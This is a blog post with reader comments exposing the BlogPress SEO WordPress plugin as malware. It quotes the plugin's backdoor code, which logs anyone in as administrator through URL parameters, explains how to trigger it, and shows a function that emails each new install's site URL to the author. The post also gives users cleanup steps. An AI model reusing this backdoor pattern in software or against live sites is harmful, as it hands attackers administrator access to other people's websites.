As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:
Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100′s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks
Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:
- Did not use a unique prefix to functions to work avoid function name collisions. Function names such as:
fun_serverpath,SureRemoveDir,fun_create_menu_wplinkwplink_activate,cleansee, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names. - Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
- Performs manual sql queries, not using the
$wpdbobject.
Analysis of the code is a little frightening. Look at this block of code:
//if loginyes and emial then login
if($loginyes==1 && $email==get_option('admin_email'))
{
global $wpdb;
$tabname=$wpdb->prefix."users";
$find_admin_sql="select * from $tabname where user_login='admin'";
$find_sql=mysql_query($find_admin_sql);
$user_numrow=mysql_num_rows($find_sql);
if($user_numrow!=0)
{
$user_login='admin';
}
if($user_numrow==0)
{
$find_ana_admin_sql="select * from $tabname";
$find_sql_res=mysql_query($find_ana_admin_sql);
while($row_find=mysql_fetch_array($find_sql_res))
{
$userid=$row_find['ID'];
$user_login_find=$row_find['user_login'];
$level=get_usermeta( $userid,'wp_user_level');
if($level==10)
{
$user_login=$user_login_find;
break;
}
}
}
$user=new WP_User(0, $user_login);
$user_pass = md5($user->user_pass);
wp_login($user_login, $user_pass, true);
wp_setcookie($user_login, $user_pass, true);
wp_set_current_user($user_id, $user_login);
$radirect=get_option('home')."/wp-admin";
echo "<script language='javascript'>";
echo "location.replace('$radirect')";
echo "</script>";
}
Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?
function email_send_fun()
{
$headers="From:".get_option('admin_email')."\n";
$headers.="Reply-to:".get_option('admin_email')."\n";
$sub="BlogPressSeo new installation.";
$mes=get_option('siteurl');
$to="info@blogpressseo.com";
mail($to,$sub,$mes,$headers);
$hwe_blogidd=get_option("hwe_blogid");
update_option("hwe_saveradio_option",3);
update_option("hwe_linkplacement",3);
if($hwe_blogidd)
{
wplink_activate();
}
}
Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.
If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.
Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.
-John Havlik
[end of transmission, stay tuned]
Trackbacks/Pingbacks
- Top Motion | Internet Marketing blog » BlogPress SEO is Malware | Mtekk's Crib
- PostRoast.com | Blog | BlogPress SEO is Malware | Mtekk's Crib
- BlogPress SEO is Malware | Mtekk's Crib | SEO News & Views
- BlogPress SEO plugin isn’t just bad, it’s malware [TNW Social Media] | Newsroom News
- BlogPress SEO plugin isn’t just bad, it’s malware
- BlogPress SEO plugin isn’t just bad, it’s malware – ArticlesInbox
- BlogPress SEO is Malware | Mtekk's Crib
- BlogPress SEO plugin isn’t just bad, it’s malware | Services For Seo
- Varning för BlogPress SEO
- BlogPress SEO plugin isn’t just bad, it’s malware [TNW Social Media] : My Tech Zero
- MY IDC » BlogPress SEO is Malware | Mtekk's Crib
- Beware of BlogPressSEO – Malware in plugin | Web Design
- El plugin BlogPress SEO es malware, no lo instalen
- BlogPress SEO Plugin is Malware http://mtekk.us/archives/enemy-of-the-spammers/blogpress-seo-malware/ | valent on twitter
- BlogPress SEO: solved - Yoast
- El plugin BlogPress SEO es malware, no lo instalen | Tuiter.com
- Yoast: BlogPress SEO: solved | SEOBlog
- === popurls.com === popular today
- BlogPress SEO plugin isn’t just bad, it’s malware [TNW Social Media] | MarketingTypo.com
- Yoast: BlogPress SEO: solved - Furlogy.com
- BlogPress SEO sadece kötü bir eklenti değil, kötü amaçlı bir yazılım. | Bloghaber.com | Webmaster haber blogu
- Is That Wordpress Plugin Update Really MALWARE Instead? How to check. | Barbara Ling, Your Outrageous Virtual Coach
- BlogPress SEO plugin isn’t just bad, it’s malware [TNW Social Media] | Technablogroll
- Yoast: BlogPress SEO: solved | Programming Blog
- wp-popular.com » Blog Archive » BlogPress SEO is Malware | Mtekk’s Crib
- No instalen el plugin BlogPress SEO, es malware
- InfoSec Daily » Episode 258 – SEO, Katana, Early Warning System & Client Site Security
- BlogPress SEO is at it Again | Mtekk's Crib
- El plugin BlogPress SEO es malware | Guia Wordpress
- Yoast: BlogPress SEO: solved | Affaholic.com
- BlogPress SEO: Blatant Spam, Malicious Code « Wordpress Consultant
- All about a Babi Italia Crib
- BlogPress SEO is in Defence Mode | Mtekk's Crib
- Yoast: BlogPress SEO: solved | Brisbane Advertising Agency
- El plugin BlogPress SEO es malware, no lo instalen | Ruben2.com
- A Paused Episode 462 | The CaffiNation Podcast
- BlogPress SEO One Week | Mtekk's Crib
- BlogPress SEO is Malware | Mtekk’s Crib | Internet Marketing NY | SMO NY | Search Engine Optimization
- BlogPress SEO is Malware | Mtekk's Crib | HNL HIP HOP
- WordPress Security 101: 8 Tips, Tricks and Tweaks to Secure Your WordPress Website - WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org
- BlogPress SEO plugin isn’t just bad, it’s malware | Computer Technology
- BlogPress SEO: solved | Programming Blog
- BlogPress SEO: solved | Affaholic.com
- Security Tips for your Wordpress Blog | kimtown Studios - Waynesboro, PA Web Design, Boutique & Photography
- SEO + wordpress themes = shenanigans! | MetaFilter :Seo Information Search
- The WordPress.org Commit Breakin – Evil Code | mtekk's Crib
- El plugin BlogPress SEO es malware | Webmasters Actualidad Tecnologia
- BlogPress SEO: A Year Later | mtekk's Crib
- Google +1 Click Jacking | mtekk's Crib
25 Responses to “BlogPress SEO is Malware”
Leave a Reply
WordCamp NYC
Just another example of something actually being too good to be true. Whoever made that plugin is a jerk.
Who would have thought? But I certainly felt it a long time ago.
Yey! Thanks for the heads up.
Good lookin’ out! Thanks.
This sort of plugin really spoils the trust of open source code and software. Shame on them!!!
If you think that there is nothing wrong with having a script generating backlinks for you, and you also believe that installing a WordPress plugin can do this for you, then you are an idiot.
I agree with Nik – There are no short cuts!
I’m glad this information was put posted and spread quickly. I’ll be informing my whole network to look out for this plug in and take a look at the ones they have.
Things like this make it mandatory to change your password frequently. No amount of security is too much for a website in my opinion.
Changing passwords in regular intervals is always a good idea, however it would not protect you from what this plugin did, if you installed it.
-John Havlik
Thank you so much for this information. I will be mailing my list immediately to let them know they need to be on guard.
I’m on your list, Kathy, and I just received your email notification with the much-appreciated heads up on this dangerous plugin.
Thank You!
Why not send the guy an email? We could ask him to stop, maybe spam him, maybe register his email account on as many spam sites as possible. After all we have the email account:
info@blogpressseo.com
We know he uses that account for at least one purpose and he probably checks it quite often. I say we teach him a lesson.
Hey now, we can’t condone the participation in any vigilante justice, especially if it qualifies as harassment. Even though the guy is malicious, and he is not from the United States…
-John Havlik
The world of open source should not be corrupted by people like this. Thank you for this post with clear details. The first part could have been a genuine mistake but not the second one.
I think the real problem is that Open Source is exploding. The security vulernabilities which are deliberately or un-intentionally written into software is the real problem if you ask me.
You only need one piece of popular software with an exploit or a “backdoor” and then millions of websites are compromised.
I just don’t see it working as well as it should be in some communities.
In other words. If it’s not backed by a real brand name, and they have no means to support what it is you are taking from them. Then you immediately have to second guess the real intention of the software.
I really do not see how this is a Open Source problem exactly. All software has security vulnerabilities, and always will as long as a human is involved.
The fact that BlogPress SEO was readily available (e.g. it was free to download), allowed me to look at the source and find the backdoor. There really is nothing WordPress itself can do, other than lockdown the API and sandbox plugins, to prevent things like this. It ultimately comes down to the user, and the need for security education.
-John Havlik
Oh wow.
I just found out about this from Yoast’s post and am alerting my readers and network as we speak (write?). Adding your feed to my feedreader, thanks for the headsup!
Nice one for the insight, wordpress should ban such plugins.
There is no way to really ban them, especially when they are not in the WordPress.org plugin repository. The only thing we can do is find these bad plugins early, and warn people know about them.
-John Havlik
Thank you for making a point here. I usually dont dissect any plug-in code I install, but it seem that we came to the point where this practice is not a bad idea. Some people are really desperate
I love that you took them to task for the crappy code style before getting to the part about them producing a backdoor. That made my morning.
Oh, I didn’t initially run into the backdoor, it was after I began writing (and said WTF? a few too many times) that I found the backdoor. There is much more crappieness in their code that I did not cover as I found the backdoor and was more interested in it than the code quality (for obvious reasons).
-John Havlik
Thanks for the Heads up….
Its really bad!
why he do it?
he’s trying to hack all wp and inject his link to get more backlink maybe?
regards
It is really bad.
Being an IT guy, we can’t just install plugins. It is better to investigate like this and then only install.
Thanks for this info.